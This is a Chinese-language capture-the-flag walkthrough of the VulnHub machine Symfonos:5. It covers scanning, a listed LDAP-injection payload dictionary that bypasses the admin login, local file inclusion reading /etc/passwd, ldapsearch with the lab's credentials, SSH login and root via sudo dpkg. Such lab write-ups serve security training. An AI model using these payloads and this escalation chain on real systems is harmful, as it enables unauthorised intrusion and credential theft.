虚拟机信息:
虚拟机下载地址:https://www.vulnhub.com/entry/symfonos-5,415/
虚拟机简介:初学者基于现实生活的机器,旨在教人们从内部理解的重要性。
目标:1个flag
级别:初级
1、主机探测
1、通过netdiscover检测主机IP地址
netdiscover -r 192.168.207.0/24
2、服务探测
1、通过nmap进行端口扫描
nmap -A -sS -sV -v -p- 192.168.207.145
查看开放22、80、389、636端口
3、渗透测试
3.1 HTTP服务探测
1.使用dirb进行服务探测
dirb http://192.168.207.140
探测到有admin登录页面
2.目录爆破
gobuster dir -u http://192.168.207.140 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 100 -x html,php,txt -q -k -f
3.访问页面存在登录页面
4.使用SQL注入爆破
wfuzz -c -z file,/usr/share/wordlists/wfuzz/Injections/SQL.txt -u "http://192.168.207.140/admin.php?username=FUZZ&password=FUZZ"
未成功
5.使用ldap爆破
wfuzz -c -z file,ldap.txt -u "http://192.168.207.140/admin.php?username=FUZZ&password=pwd"
字典内容如下
*
*)(&
*))%00
*()|%26'
*()|&'
*(|(mail=*))
*(|(objectclass=*))
*)(uid=*))(|(uid=*
*/*
*|
/
//
//*
@*
|
admin*
admin*)((|userpassword=*)
admin*)((|userPassword=*)
x' or name()='username' or 'x'='y
查看可以通过*))%00
爆破成功
6.成功登录网站后台
3.2 站点测试
1.查看网页源代码
可能存在本地文件包含
2.尝试读取本地文件
http://192.168.207.140/home.php?url=/etc/passwd
成功读取本地文件
3.读取本地文件
http://192.168.207.140/home.php?url=admin.php
在网页源代码中查看获取到LDAP连接用户名和密码
4.使用ldap查找
ldapsearch -x -LLL -h 192.168.207.140 -D 'cn=admin,dc=symfonos,dc=local' -w qMDdyZh3cT6eeAWD -b 'dc=symfonos,dc=local'
查看到用户名为:zeus,密码为:Y2V0a0tmNHdDdUhDOUZFVA==,解码后为:cetkKf4wCuHC9FET
5.使用账号登录SSH
ssh [email protected]
3.3 系统提权
1.查看sudo权限
sudo -l
查看存在dpkg提权
2.执行提权命令
sudo dpkg -l
并输入!/bin/bash
3.已经提权成功
原文始发于微信公众号(安全孺子牛):OSCP难度靶机之Symfonos:5
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论